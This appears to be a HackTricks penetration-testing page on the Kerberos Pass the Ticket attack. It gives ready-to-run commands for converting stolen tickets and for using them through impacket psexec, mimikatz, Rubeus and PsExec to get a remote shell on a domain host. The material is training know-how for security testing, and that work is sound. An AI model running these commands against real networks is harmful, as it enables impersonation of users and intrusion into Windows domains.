HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Pass the Ticket
Support HackTricks and get benefits!

Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
Read:

Swaping Linux and Windows tickets between platforms

The ticket_converter script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:
1
[email protected]:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
2
Converting ccache => kirbi
3
[email protected]:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
4
Converting kirbi => ccache
Copied!
โ€‹Kekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.

Pass The Ticket Attack

Linux
1
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
2
python psexec.py jurassic.park/[email protected] -k -no-pass
Copied!
Windows
1
#Load the ticket in memory using mimikatz or Rubeus
2
mimikatz.exe "kerberos::ptt [0;28419fe][email protected]"
3
.\Rubeus.exe ptt /ticket:[0;28419fe][email protected]
4
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
5
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
Copied!
Support HackTricks and get benefits!